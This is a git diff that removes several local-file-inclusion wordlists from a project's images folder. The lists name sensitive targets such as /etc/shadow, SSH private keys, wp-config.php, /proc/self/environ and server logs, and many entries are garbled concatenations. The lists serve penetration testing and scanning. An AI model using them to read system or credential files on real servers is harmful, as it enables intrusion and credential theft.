-/var/log/ftp-proxy/ftp-proxy.logvar/log/ftp-proxy
-/var/log/httpsd/ssl.access_log
-/var/log/httpsd/ssl_log
-/var/log/kern.log
-/var/log/lastlog
-/var/log/lighttpd/access.log
-/var/log/lighttpd/error.log
-/var/log/lighttpd/lighttpd.access.log
-/var/log/lighttpd/lighttpd.error.log
-/var/log/mail.info
-/var/log/maillog
-/var/log/mail.warn
-/var/log/message
-/var/log/mysqlderror.log
-/var/log/mysqlderror.logvar/log/mysql/mysql.log
-/var/log/mysql/mysql.log
-/var/log/news
-/var/log/nginx/access.log
-/var/log/nginx/access.logproc/self/cmdline
-/var/log/nginx/error.log
-/var/log/postgresql/postgresql-10-main.logvar/log/apache2/error.log
-/var/log/postgresql/postgresql-9.6-mail.log
-/var/log/qmail
-/var/log/redis/redis-server.log
-/var/log/samba/log.smbd
-/var/log/secure
-/var/log/smtpd
-/var/log/spooler
-/var/log/sshd.log
-/var/log/syslog
-/var/log/telnetd
-/var/log/wtmp
-/var/log/xferlog
-/var/log/yum.log
-/var/mail/root
-/var/run/secrets/kubernetes.io/serviceaccount
-/var/run/utmp
-/var/webmin/miniserv.log
-/var/www/conf/httpd.conf
-/var/www/html/wordpress/wp-config.php
-/var/www/html/wp/wp-config.php
-/var/www/log/access_log
-/var/www/log/error_log
-/var/www/logs/access.log
-/var/www/logs/access_log
-/var/www/logs/access_logvar/www/logs/access.log
-/var/www/mgr/logs/access.log
-/var/www/mgr/logs/error_log
-/var/www/mgr/logs/error.logvar/www/mgr/logs/access_log
-/var/www/wordpress/wp-config.php
-/var/www/wp/wp-config.php
-~/.viminfo
-/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf
-/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.confVolumes/Macintosh_HD1/opt/apache/conf/httpd.conf
-/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php
-/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.phpVolumes/Macintosh_HD1/usr/local/php4/httpd.conf.php
-/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini
-/Volumes/webBackup/private/etc/httpd/httpd.conf
-/Volumes/webBackup/private/etc/httpd/httpd.conf.defaultProgramFilesApacheGroupApacheconfhttpd.conf
-/web/conf/php.ini
-/WINDOWSphp.ini
-/WINNTphp.ini
-~/.wm_style
-/xamppapachebinphp.ini
-/xampp/logs/access_log
-~/.Xdefaults
-~/.xinitrc
-~/.Xresources
-~/.xsession
\ No newline at end of file
diff --git a/src/images/lfi (2).txt b/src/images/lfi (2).txt
deleted file mode 100644
index 572141363..000000000
--- a/src/images/lfi (2).txt
+++ /dev/null
@@ -1 +0,0 @@
-423
diff --git a/src/images/lfi (3).txt b/src/images/lfi (3).txt
deleted file mode 100644
index 28a6c9284..000000000
--- a/src/images/lfi (3).txt
+++ /dev/null
@@ -1,249 +0,0 @@
-/apache/logs/access.log
-/apache/logs/error.log
-/apachephpphp.ini
-/bin/php.ini
-/ect/hostname
-/etc/apache2/conf/httpd.conf
-/etc/apache2/httpd.conf
-/etc/apache/conf/httpd.conf
-/etc/chrootUsersvar/log/xferlog
-/etc/crontab
-/etc/dovecot/dovecot.passwd
-/etc/fstab
-/etc/ftpchroot
-/etc/ftphosts
-/etc/group
-/etc/hosts
-/etc/httpd.conf
-/etc/httpd/conf/httpd.conf
-/etc/httpd/conf/httpd.confetc/http/conf/httpd.conf
-/etc/httpd/httpd.conf
-/etc/httpd/logs/access.log
-/etc/httpd/logs/access_logetc/httpd/logs/error_log
-/etc/httpd/logs/access.logProgramFilesApacheGroupApachelogsaccess.log
-/etc/httpd/logs/error.log
-/etc/httpd/php.ini
-/etc/http/httpd.conf
-/etc/issue
-/etc/logrotate.d/ftp
-/etc/logrotate.d/proftpdwww/logs/proftpd.system.log
-/etc/logrotate.d/vsftpd.log
-/etc/motd
-/etc/motdetc/passwd
-/etc/my.cnf
-/etc/mysql/my.cnf
-/etc/netconfig
-/etc/passwd
-/etc/php4.4/fcgi/php.inietc/php4/apache/php.ini
-/etc/php4/apache2/php.ini
-/etc/php4/cgi/php.ini
-/etc/php5/apache2/php.ini
-/etc/php5/apache/php.ini
-/etc/php5/cgi/php.ini
-/etc/php/apache2/php.ini
-/etc/php/php4/php.inietc/php/apache/php.ini
-/etc/php/php.ini
-/etc/profile
-/etc/proftp.conf
-/etc/proftpd/modules.confvar/log/vsftpd.log
-/etc/protpd/proftpd.conf
-/etc/pure-ftpd.conf
-/etc/pureftpd.pdbetc/pureftpd.passwd
-/etc/pure-ftpd/pure-ftpd.conf
-/etc/pure-ftpd/pure-ftpd.pdb
-/etc/pure-ftpd/pureftpd.pdb
-/etc/security/environetc/security/limits
-/etc/security/group
-/etc/security/passwd
-/etc/security/user
-/etc/shadow
-/etc/sudoers
-/etc/vhcs2/proftpd/proftpd.conf
-/etc/vsftpd.chroot_list
-/etc/vsftpd.conf
-/etc/vsftpd/vsftpd.conf
-/etc/wu-ftpd/ftpaccess
-/etc/wu-ftpd/ftphosts
-/etc/wu-ftpd/ftpusers
-/home2binstableapachephp.inihomebinstableapachephp.ini
-/logs/access_log
-/logs/access.loglogs/error_log
-/logs/error.log
-/logs/pure-ftpd.log
-/NetServerbinstableapachephp.ini
-/opt/apache/conf/httpd.confopt/apache2/conf/httpd.conf
-/opt/lampp/logs/access_logopt/lampp/logs/access.log
-/opt/lampp/logs/error_log
-/opt/lampp/logs/error.logopt/xampp/logs/access_log
-/opt/xampp/etc/php.ini
-/opt/xampp/logs/access.log
-/opt/xampp/logs/error.log
-/opt/xampp/logs/error_log
-/php4php.ini
-/php5php.ini
-/phpphp.ini
-/PHPphp.ini
-/private/etc/httpd/httpd.conf
-/private/etc/httpd/httpd.conf.defaultVolumes/webBackup/opt/apache2/conf/httpd.conf
-/proc/cmdline
-/proc/mounts
-/proc/net/arp
-/proc/net/route
-/proc/net/tcp
-/proc/net/udp
-/proc/sched_debug
-/proc/self/cmdline
-/proc/self/environ
-/proc/self/fd/0
-/proc/self/fd/1
-/proc/self/fd/10
-/proc/self/fd/11
-/proc/self/fd/12
-/proc/self/fd/13
-/proc/self/fd/14
-/proc/self/fd/15
-/proc/self/fd/16
-/proc/self/fd/17
-/proc/self/fd/18
-/proc/self/fd/19
-/proc/self/fd/2
-/proc/self/fd/20
-/proc/self/fd/21
-/proc/self/fd/22
-/proc/self/fd/23
-/proc/self/fd/24
-/proc/self/fd/25
-/proc/self/fd/26
-/proc/self/fd/27
-/proc/self/fd/28
-/proc/self/fd/29
-/proc/self/fd/3
-/proc/self/fd/30
-/proc/self/fd/31
-/proc/self/fd/32
-/proc/self/fd/33
-/proc/self/fd/34
-/proc/self/fd/35
-/proc/self/fd/36
-/proc/self/fd/4proc/self/fd/5
-/proc/self/fd/6
-/proc/self/fd/7
-/proc/self/fd/8
-/proc/self/fd/9
-/proc/self/stat
-/proc/self/status
-/proc/self/statvar/log/apache2/error_log
-/proc/version
-/ProgramFilesApacheGroupApache2confhttpd.confProgramFilesxamppapacheconfhttpd.conf
-/ProgramFilesApacheGroupApachelogserror.logusr/local/apache2/conf/httpd.conf
-/root/.bash_history
-/usr/apache2/conf/httpd.conf
-/usr/apache/conf/httpd.conf
-/usr/lib/php.ini
-/usr/lib/php/php.ini
-/usr/lib/security/mkuser.default
-/usr/local/apache2/conf/httpd.conf
-/usr/local/apache2/logs/access_logusr/local/apache2/logs/access.log
-/usr/local/apache2/logs/error_log
-/usr/local/apache2/logs/error.logvar/log/access_log
-/usr/local/apache/conf/php.ini
-/usr/local/apache/httpd.confusr/local/apache2/httpd.conf
-/usr/local/apache/logs/access_log
-/usr/local/apache/logs/access.logusr/local/apache/logs/error_log
-/usr/local/apache/logs/error.log
-/usr/local/apps/apache2/conf/httpd.confusr/local/apps/apache/conf/httpd.conf
-/usr/local/cpanel/logs
-/usr/local/cpanel/logs/error_log
-/usr/local/cpanel/logs/license_log
-/usr/local/cpanel/logs/login_logusr/local/cpanel/logs/stats_log
-/usr/local/cpanel/logs/stats_logusr/local/cpanel/logs/access_log
-/usr/local/etc/apache2/conf/httpd.confusr/local/etc/httpd/conf/httpd.conf
-/usr/local/etc/apache/conf/httpd.conf
-/usr/local/etc/apache/conf/httpd.confusr/local/apache/conf/httpd.conf
-/usr/local/etc/apache/vhosts.confetc/php.ini
-/usr/local/etc/php.ini
-/usr/local/etc/pure-ftpd.conf
-/usr/local/etc/pureftpd.pdb
-/usr/local/httpd/conf/httpd.conf
-/usr/local/lib/php.iniusr/local/php/lib/php.ini
-/usr/local/php4/httpd.conf
-/usr/local/php4/httpd.conf.php
-/usr/local/php4/lib/php.ini
-/usr/local/php5/httpd.conf
-/usr/local/php5/httpd.conf.phpusr/local/php/httpd.conf
-/usr/local/php5/lib/php.ini
-/usr/local/php/httpd.conf.php
-/usr/local/pureftpd/etc/pure-ftpd.conf
-/usr/local/pureftpd/etc/pureftpd.pdbusr/local/pureftpd/sbin/pure-config.pl
-/usr/local/Zend/etc/php.ini
-/usr/pkgsrc/net/pureftpd/usr/ports/contrib/pure-ftpd/
-/usr/ports/ftp/pure-ftpd/
-/usr/ports/net/pure-ftpd/
-/usr/sbin/pure-config.plusr/etc/pure-ftpd.conf
-/var/adm/log/xferlog
-/var/cpanel/cpanel.config
-/var/lib/mysql/my.cnf
-/var/local/www/conf/php.inietc/php/cgi/php.ini
-/var/log/access.log
-/var/log/apache2/access.log
-/var/log/apache2/access_logvar/log/httpd/error_log
-/var/log/apache/error.log
-/var/log/cron.logvar/log/couchdb/couch.log
-/var/log/dmessage
-/var/log/error_log
-/var/log/error.logvar/log/apache/access_log
-/var/log/exim4/mainlog
-/var/log/exim4_mainlog
-/var/log/exim4/paniclog
-/var/log/exim_mainlog
-/var/log/exim/mainlogvar/log/maillog
-/var/log/exim/paniclog
-/var/log/exim_paniclog
-/var/log/exim/rejectlog
-/var/log/exim_rejectlog
-/var/log/ftplog
-/var/log/ftp-proxy/ftp-proxy.logvar/log/ftp-proxy
-/var/log/httpd/access.log
-/var/log/httpd/access_log
-/var/log/httpd/error.log
-/var/log/mail
-/var/log/mail.log
-/var/log/messages
-/var/log/mysqlderror.logvar/log/mysql/mysql.log
-/var/log/mysql.log
-/var/log/mysql/mysql-bin.log
-/var/log/mysql/mysql-slow.log
-/var/log/news
-/var/log/nginx/access.logproc/self/cmdline
-/var/log/postgresql/postgresql-10-main.logvar/log/apache2/error.log
-var/log/postgresql/postgresql-9.6-mail.log
-/var/log/proftpd
-/var/log/pureftpd.log
-/var/log/pure-ftpd/pure-ftpd.log
-/var/log/qmail
-/var/log/redis/redis-server.log
-/var/log/samba/log.smbd
-/var/log/smtpd
-/var/log/spooler
-/var/log/syslog
-/var/log/telnetd
-/var/mail/root
-/var/mysql.log
-/var/spool/cron/crontabs/root
-/var/www/conf/httpd.conf
-/var/www/logs/access_logvar/www/logs/access.log
-/var/www/logs/error.log
-/var/www/logs/error_log
-/var/www/mgr/logs/access.log
-/var/www/mgr/logs/error_log
-/var/www/mgr/logs/error.logvar/www/mgr/logs/access_log
-/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf
-/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.confVolumes/Macintosh_HD1/opt/apache/conf/httpd.conf
-/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php
-/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.phpVolumes/Macintosh_HD1/usr/local/php4/httpd.conf.php
-/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini
-/Volumes/webBackup/private/etc/httpd/httpd.conf
-/Volumes/webBackup/private/etc/httpd/httpd.conf.defaultProgramFilesApacheGroupApacheconfhttpd.conf
-/web/conf/php.ini
-/WINDOWSphp.iniWINNTphp.ini
-/xamppapachebinphp.ini
diff --git a/src/images/lfi-with-phpinfo-assistance.pdf b/src/images/lfi-with-phpinfo-assistance.pdf
deleted file mode 100644
index 3525b48e7..000000000
Binary files a/src/images/lfi-with-phpinfo-assistance.pdf and /dev/null differ
diff --git a/src/images/lfi.txt b/src/images/lfi.txt
deleted file mode 100644
index dd887237f..000000000
--- a/src/images/lfi.txt
+++ /dev/null
@@ -1,430 +0,0 @@
-/apache/logs/access.log
-/apache/logs/access_log
-/apache/logs/error.log
-/apache/logs/error_log
-~/.atfp_history
-~/.bash_history
-~/.bash_logout
-~/.bash_profile
-~/.bashrc
-/bin/php.ini
-/defaultVolumes/webBackup/opt/apache2/conf/httpd.conf
-/etc/anaconda-ks.cfg
-/etc/anacrontab
-/etc/apache2/apache2.conf
-/etc/apache2/conf/httpd.conf
-/etc/apache/conf/httpd.conf
-/etc/at.allow
-/etc/at.deny
-/etc/bashrc
-/etc/bootptab
-/etc/centos-release
-/etc/cesi.conf
-/etc/chrootUsers
-/etc/chrootUsersvar/log/xferlog
-/etc/chttp.conf
-/etc/cron.allow
-/etc/cron.deny
-/etc/crontab
-/etc/cups/cupsd.conf
-/etc/debconf.conf
-/etc/debian_version
-/etc/dovecot/dovecot.passwd
-/etc/environment
-/etc/fstab
-/etc/ftpaccess
-/etc/groups
-/etc/grub.conf
-/etc/gshadow
-/etc/hostapd.conf
-/etc/hostname
-/etc/hosts.allow
-/etc/hosts.deny
-/etc/http/conf/httpd.conf
-/etc/httpd/access.conf
-/etc/httpd.conf
-/etc/httpd/srm.conf
-/etc/http/httpd.conf
-/etc/inetd.conf
-/etc/inittab
-/etc/lighttpd.conf
-/etc/lilo.conf
-/etc/logrotate.d/proftpd
-/etc/logrotate.d/proftpdwww/logs/proftpd.system.log
-/etc/lsb-release
-/etc/master.passwd
-/etc/modules.conf
-/etc/motdetc/passwd
-/etc/mtab
-/etc/my.conf
-/etc/mysql/user.MYD
-/etc/netconfig
-/etc/network/interfaces
-/etc/networks
-/etc/npasswd
-/etc/ntp.conf
-/etc/os-release
-/etc/php4.4/fcgi/php.ini
-/etc/php4.4/fcgi/php.inietc/php4/apache/php.ini
-/etc/php4/apache/php.ini
-/etc/php5/cgi/php.ini
-/etc/php/apache/php.ini
-/etc/php/cgi/php.ini
-/etc/php.ini
-/etc/php/php4/php.ini
-/etc/php/php4/php.inietc/php/apache/php.ini
-/etc/polkit-1/localauthority.conf.d/50-localauthority.conf
-/etc/polkit-1/localauthority.conf.d/51-debian-sudo.conf
-/etc/printcap
-/etc/proftpd/modules.confvar/log/vsftpd.log
-/etc/proftpd/proftpd.conf
-/etc/protocols
-/etc/protpd/proftpd.conf
-/etc/pureftpd.passwd
-/etc/pureftpd.pdb
-/etc/pureftpd.pdbetc/pureftpd.passwd
-/etc/pure-ftpd/pureftpd.pdb
-/etc/pure-ftpd/putreftpd.pdb
-/etc/rsyncd.conf
-/etc/rsyslog.conf
-/etc/redhat-release
-/etc/samba/smb.conf
-/etc/security/environetc/security/limits
-/etc/security/group
-/etc/security/passwd
-/etc/security/user
-/etc/services
-/etc/shells
-/etc/snmpd.conf
-/etc/ssh/ssh_host_ecdsa_key
-/etc/ssh/ssh_host_ecdsa_key.pub
-/etc/ssh/ssh_host_key
-/etc/ssh/ssh_host_key.pub
-/etc/ssh/ssh_host_rsa_key
-/etc/ssh/ssh_host_rsa_key.pub
-/etc/sudoers
-/etc/supervisord.conf
-/etc/sysconfig/network
-/etc/sysctl.conf
-/etc/syslog.conf
-/etc/system-release
-/etc/termcap
-/etc/timezone
-/etc/tomcat/tomcat-users.xml
-/etc/updatedb.conf
-~/.gtkrc
-/local/apache2/conf/httpd.conf
-/log/apache2/error_log
-~/.login
-~/.logout
-/logs/access.log
-/logs/access_log
-/logs/error.log
-/logs/error_log
-/logs/security_debug_log
-/logs/security_log
-~/.mysql_history
-~/.nano_history
-/opt/apache2/conf/httpd.conf
-/opt/apache/conf/httpd.conf
-/opt/lampp/etc/httpd.conf
-/opt/lampp/logs/access.log
-/opt/lampp/logs/access_log
-/opt/lampp/logs/error_log
-/opt/lampp/logs/error.logopt
-/opt/xampp/logs/access.log
-/opt/xampp/logs/error.log
-/opt/xampp/logs/error_log
-/php4php.ini
-/php5php.ini
-~/.php_history
-/phpphp.ini
-/PHPphp.ini
-/private/etc/httpd/httpd.conf
-/private/etc/httpd/httpd.conf.
-/proc/cpuinfo
-/proc/filesystems
-/proc/interrupts
-/proc/ioports
-/proc/meminfo
-/proc/modules
-/proc/self/cmdline
-/proc/self/cwd/index.php
-/proc/self/fd/0
-/proc/self/fd/1
-/proc/self/fd/10
-/proc/self/fd/100
-/proc/self/fd/11
-/proc/self/fd/12
-/proc/self/fd/13
-/proc/self/fd/14
-/proc/self/fd/15
-/proc/self/fd/16
-/proc/self/fd/17
-/proc/self/fd/18
-/proc/self/fd/19
-/proc/self/fd/2
-/proc/self/fd/20
-/proc/self/fd/21
-/proc/self/fd/22
-/proc/self/fd/23
-/proc/self/fd/24
-/proc/self/fd/25
-/proc/self/fd/26
-/proc/self/fd/27
-/proc/self/fd/28
-/proc/self/fd/29
-/proc/self/fd/3
-/proc/self/fd/30
-/proc/self/fd/31
-/proc/self/fd/32
-/proc/self/fd/33
-/proc/self/fd/34
-/proc/self/fd/35
-/proc/self/fd/36
-/proc/self/fd/37
-/proc/self/fd/38
-/proc/self/fd/39
-/proc/self/fd/4
-/proc/self/fd/41
-/proc/self/fd/42
-/proc/self/fd/43
-/proc/self/fd/44
-/proc/self/fd/45
-/proc/self/fd/46
-/proc/self/fd/47
-/proc/self/fd/48
-/proc/self/fd/49
-/proc/self/fd/5
-/proc/self/fd/51
-/proc/self/fd/52
-/proc/self/fd/53
-/proc/self/fd/54
-/proc/self/fd/55
-/proc/self/fd/56
-/proc/self/fd/57
-/proc/self/fd/58
-/proc/self/fd/59
-/proc/self/fd/6
-/proc/self/fd/61
-/proc/self/fd/62
-/proc/self/fd/63
-/proc/self/fd/64
-/proc/self/fd/65
-/proc/self/fd/66
-/proc/self/fd/67
-/proc/self/fd/68
-/proc/self/fd/69
-/proc/self/fd/7
-/proc/self/fd/71
-/proc/self/fd/72
-/proc/self/fd/73
-/proc/self/fd/74
-/proc/self/fd/75
-/proc/self/fd/76
-/proc/self/fd/77
-/proc/self/fd/78
-/proc/self/fd/79
-/proc/self/fd/8
-/proc/self/fd/81
-/proc/self/fd/82
-/proc/self/fd/83
-/proc/self/fd/84
-/proc/self/fd/85
-/proc/self/fd/86
-/proc/self/fd/87
-/proc/self/fd/88
-/proc/self/fd/89
-/proc/self/fd/9
-/proc/self/fd/91
-/proc/self/fd/92
-/proc/self/fd/93
-/proc/self/fd/94
-/proc/self/fd/95
-/proc/self/fd/96
-/proc/self/fd/97
-/proc/self/fd/98
-/proc/self/fd/99
-/proc/self/net/arp
-/proc/self/stat
-/proc/self/status
-/proc/self/statvar
-/proc/stat
-/proc/swaps
-~/.profile
-/root/anaconda-ks.cfg
-/root/.bash_history
-/root/.ssh/authorized_hosts
-/root/.ssh/authorized_keys
-/root/.ssh/id_dsa
-/root/.ssh/id_rsa
-/root/.ssh/known_hosts
-~/.ssh/authorized_keys
-~/.ssh/id_dsa
-~/.ssh/id_dsa.pub
-~/.ssh/identity
-~/.ssh/identity.pub
-~/.ssh/id_rsa
-~/.ssh/id_rsa.pub
-/usr/apache2/conf/httpd.conf
-/usr/apache/conf/httpd.conf
-/usr/etc/pure-ftpd.conf
-/usr/lib/security/mkuser.default
-/usr/local/apache2/conf/httpd.conf
-/usr/local/apache2/log/error_log
-/usr/local/apache2/logs/access_logusr/local/apache2/logs/access.log
-/usr/local/apache2/logs/error_log
-/usr/local/apache2/logs/error.logvar/log/access_log
-/usr/local/apache/audit_log
-/usr/local/apache/conf/modsec.conf
-/usr/local/apache/error.log
-/usr/local/apache/error_log
-/usr/local/apache/httpd.confusr/local/apache2/httpd.conf
-/usr/local/apache/log
-/usr/local/apache/log/error_log
-/usr/local/apache/logs
-/usr/local/apache/logs/access.log
-/usr/local/apache/logs/access.logusr/local/apache/logs/error_log
-/usr/local/apache/logs/error.log
-/usr/local/apps/apache2/conf/httpd.confusr/local/apps/apache/conf/httpd.conf
-/usr/local/cpanel/logs/access_log
-/usr/local/cpanel/logs/login_log
-/usr/local/cpanel/logs/login_logusr/local/cpanel/logs/stats_log
-/usr/local/cpanel/logs/stats_log
-/usr/local/cpanel/logs/stats_logusr/local/cpanel/logs/access_log
-/usr/local/etc/apache2/conf/httpd.confusr/local/etc/httpd/conf/httpd.conf
-/usr/local/etc/apache/conf/httpd.conf
-/usr/local/etc/apache/conf/httpd.confusr/local/apache/conf/httpd.conf
-/usr/local/etc/apache/vhosts.confetc/php.ini
-/usr/local/etc/httpd/logs/access_log
-/usr/local/etc/httpd/logs/error_log
-/usr/local/httpd/conf/httpd.conf
-/usr/local/lib/php.ini
-/usr/local/lib/php.iniusr/local/php/lib/php.ini
-/usr/local/php5/httpd.conf.php
-/usr/local/php5/httpd.conf.phpusr/local/php/httpd.conf
-/usr/local/php/httpd.conf
-/usr/local/php/httpd.conf.ini
-/usr/local/php/httpd.conf.php
-/usr/local/php/lib/php.ini
-/usr/local/pureftpd/etc/pureftpd.pdbusr/local/pureftpd/sbin/pure-config.pl
-/usr/local/pureftpd/etc/pureftpd.pdn
-/usr/local/pureftpd/sbin/pure-config.pl
-/usr/local/www/logs/httpd_log
-/usr/pkgsrc/net/pureftpd/usr/ports/contrib/pure-ftpd/
-/usr/ports/ftp/pure-ftpd/
-/usr/ports/net/pure-ftpd/
-/usr/sbin/pure-config.pl
-/usr/sbin/pure-config.plusr/etc/pure-ftpd.conf
-/usr/var/lib/mysql/debian.cnf
-/usr/var/lib/mysql/my.cnf
-/usr/var/lib/mysql/user.MYD
-/var/apache2/config.inc
-/var/apache/logs/access_log
-/var/apache/logs/error_log
-/var/htmp
-/var/lib/mysql/debian.cnf
-/var/lib/mysql/mysql/user.MYD
-/var/lib/mysql/user.MYD
-/var/local/www/conf/php.ini
-/var/local/www/conf/php.inietc/php/cgi/php.ini
-/var/log/access.log
-/var/log/apache2/access_log
-/var/log/apache2/access_logvar/log/httpd/error_log
-/var/log/apache2/error.log
-/var/log/apache2/error_log
-/var/log/apache/access_log
-/var/log/apache/error_log
-/var/log/apache-ssl/access.log
-/var/log/apache-ssl/error.log
-/var/log/auth.log
-/var/log/boot
-/var/log/chttp.log
-/var/log/cron.logvar/log/couchdb/couch.log
-/var/log/cups/error.log
-/var/log/daemon.log
-/var/log/debug
-/var/log/dmesg
-/var/log/dmessage
-/var/log/dpkg.log
-/var/log/error_log
-/var/log/error.logvar/log/apache/access_log
-/var/log/exim4/mainlog
-/var/log/exim4_mainlog
-/var/log/exim4/paniclog
-/var/log/exim/mainlog
-/var/log/exim/mainlogvar/log/maillog
-/var/log/exim.paniclog
-/var/log/exim/paniclog
-/var/log/faillog
-/var/log/ftp-proxy
-/var/log/ftp-proxy/ftp-proxy.log
-/var/log/ftp-proxy/ftp-proxy.logvar/log/ftp-proxy
-/var/log/httpsd/ssl.access_log
-/var/log/httpsd/ssl_log
-/var/log/kern.log
-/var/log/lastlog
-/var/log/lighttpd/access.log
-/var/log/lighttpd/error.log
-/var/log/lighttpd/lighttpd.access.log
-/var/log/lighttpd/lighttpd.error.log
-/var/log/mail.info
-/var/log/maillog
-/var/log/mail.warn
-/var/log/message
-/var/log/mysqlderror.log
-/var/log/mysqlderror.logvar/log/mysql/mysql.log
-/var/log/mysql/mysql.log
-/var/log/news
-/var/log/nginx/access.log
-/var/log/nginx/access.logproc/self/cmdline
-/var/log/nginx/error.log
-/var/log/postgresql/postgresql-10-main.logvar/log/apache2/error.log
-/var/log/postgresql/postgresql-9.6-mail.log
-/var/log/qmail
-/var/log/redis/redis-server.log
-/var/log/samba/log.smbd
-/var/log/secure
-/var/log/smtpd
-/var/log/spooler
-/var/log/sshd.log
-/var/log/syslog
-/var/log/telnetd
-/var/log/wtmp
-/var/log/xferlog
-/var/log/yum.log
-/var/mail/root
-/var/run/secrets/kubernetes.io/serviceaccount
-/var/run/utmp
-/var/webmin/miniserv.log
-/var/www/conf/httpd.conf
-/var/www/html/wordpress/wp-config.php
-/var/www/html/wp/wp-config.php
-/var/www/log/access_log
-/var/www/log/error_log
-/var/www/logs/access.log
-/var/www/logs/access_log
-/var/www/logs/access_logvar/www/logs/access.log
-/var/www/mgr/logs/access.log
-/var/www/mgr/logs/error_log
-/var/www/mgr/logs/error.logvar/www/mgr/logs/access_log
-/var/www/wordpress/wp-config.php
-/var/www/wp/wp-config.php
-~/.viminfo
-/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf
-/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.confVolumes/Macintosh_HD1/opt/apache/conf/httpd.conf
-/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php
-/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.phpVolumes/Macintosh_HD1/usr/local/php4/httpd.conf.php
-/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini
-/Volumes/webBackup/private/etc/httpd/httpd.conf
-/Volumes/webBackup/private/etc/httpd/httpd.conf.defaultProgramFilesApacheGroupApacheconfhttpd.conf
-/web/conf/php.ini
-/WINDOWSphp.ini
-/WINNTphp.ini
-~/.wm_style
-/xamppapachebinphp.ini
-/xampp/logs/access_log
-~/.Xdefaults
-~/.xinitrc
-~/.Xresources
-~/.xsession
\ No newline at end of file
diff --git a/src/images/lfi2.txt b/src/images/lfi2.txt
deleted file mode 100644
index 9944f6cd0..000000000
--- a/src/images/lfi2.txt
+++ /dev/null
@@ -1,1008 +0,0 @@
-/apache2/logs/access.log
-/apache2/logs/error.log
-/apache/conf/httpd.conf
-/apache/logs/access.log
-/apache/logs/error.log
-/apache/php/php.ini
-/apache\php\php.ini
-/bin/php.ini
-/boot/grub/grub.cfg
-/boot/grub/menu.lst
-/etc/adduser.conf
-/etc/alias
-/etc/apache22/conf/httpd.conf
-/etc/apache22/httpd.conf
-/etc/apache2/apache2.conf
-/etc/apache2/apache.conf
-/etc/apache2/conf/httpd.conf
-/etc/apache2/default-server.conf
-/etc/apache2/envvars
-/etc/apache2/httpd2.conf
-/etc/apache2/httpd.conf
-/etc/apache2/mods-available/autoindex.conf
-/etc/apache2/mods-available/deflate.conf
-/etc/apache2/mods-available/dir.conf
-/etc/apache2/mods-available/mem_cache.conf
-/etc/apache2/mods-available/mime.conf
-/etc/apache2/mods-available/proxy.conf
-/etc/apache2/mods-available/setenvif.conf
-/etc/apache2/mods-available/ssl.conf
-/etc/apache2/mods-enabled/alias.conf
-/etc/apache2/mods-enabled/deflate.conf
-/etc/apache2/mods-enabled/dir.conf
-/etc/apache2/mods-enabled/mime.conf
-/etc/apache2/mods-enabled/negotiation.conf
-/etc/apache2/mods-enabled/php5.conf
-/etc/apache2/mods-enabled/status.conf
-/etc/apache2/ports.conf
-/etc/apache2/sites-available/default
-/etc/apache2/sites-available/default-ssl
-/etc/apache2/sites-enabled/000-default
-/etc/apache2/sites-enabled/default
-/etc/apache2/ssl-global.conf
-/etc/apache/access.conf
-/etc/apache/apache.conf
-/etc/apache/conf/httpd.conf
-/etc/apache/default-server.conf
-/etc/apache/httpd.conf
-/etc/apt/apt.conf
-/etc/avahi/avahi-daemon.conf
-/etc/bash.bashrc
-/etc/bluetooth/input.conf
-/etc/bluetooth/main.conf
-/etc/bluetooth/network.conf
-/etc/bluetooth/rfcomm.conf
-/etc/ca-certificates.conf
-/etc/ca-certificates.conf.dpkg-old
-/etc/casper.conf
-/etc/chkrootkit.conf
-/etc/chrootUsers
-/etc/clamav/clamd.conf
-/etc/clamav/freshclam.conf
-/etc/crontab
-/etc/crypttab
-/etc/cups/acroread.conf
-/etc/cups/cupsd.conf
-/etc/cups/cupsd.conf.default
-/etc/cups/pdftops.conf
-/etc/cups/printers.conf
-/etc/cvs-cron.conf
-/etc/cvs-pserver.conf
-/etc/debconf.conf
-/etc/debian_version
-/etc/default/grub
-/etc/deluser.conf
-/etc/dhcp3/dhclient.conf
-/etc/dhcp3/dhcpd.conf
-/etc/dhcp/dhclient.conf
-/etc/dns2tcpd.conf
-/etc/e2fsck.conf
-/etc/esound/esd.conf
-/etc/etter.conf
-/etc/exports
-/etc/fedora-release
-/etc/firewall.rules
-/etc/foremost.conf
-/etc/fstab
-/etc/ftpchroot
-/etc/ftphosts
-/etc/ftpusers
-/etc/fuse.conf
-/etc/group
-/etc/group-
-/etc/hdparm.conf
-/etc/host.conf
-/etc/hostname
-/etc/hosts
-/etc/hosts.allow
-/etc/hosts.deny
-/etc/http/conf/httpd.conf
-/etc/httpd/apache2.conf
-/etc/httpd/apache.conf
-/etc/httpd.conf
-/etc/httpd/conf
-/etc/httpd/conf/apache2.conf
-/etc/httpd/conf/apache.conf
-/etc/httpd/conf.d
-/etc/httpd/conf/httpd.conf
-/etc/httpd/extra/httpd-ssl.conf
-/etc/httpd/httpd.conf
-/etc/httpd/logs/acces.log
-/etc/httpd/logs/acces_log
-/etc/httpd/logs/access.log
-/etc/httpd/logs/access_log
-/etc/httpd/logs/error.log
-/etc/httpd/logs/error_log
-/etc/httpd/mod_php.conf
-/etc/httpd/php.ini
-/etc/http/httpd.conf
-/etc/inetd.conf
-/etc/init.d
-/etc/inittab
-/etc/ipfw.conf
-/etc/ipfw.rules
-/etc/issue
-/etc/issue.net
-/etc/kbd/config
-/etc/kernel-img.conf
-/etc/kernel-pkg.conf
-/etc/ldap/ldap.conf
-/etc/ld.so.conf
-/etc/lighttpd/lighthttpd.conf
-/etc/login.defs
-/etc/logrotate.conf
-/etc/ltrace.conf
-/etc/mail/sendmail.conf
-/etc/mandrake-release
-/etc/manpath.config
-/etc/miredo.conf
-/etc/miredo/miredo.conf
-/etc/miredo/miredo-server.conf
-/etc/miredo-server.conf
-/etc/modules
-/etc/mono/config
-/etc/motd
-/etc/mtab
-/etc/mtools.conf
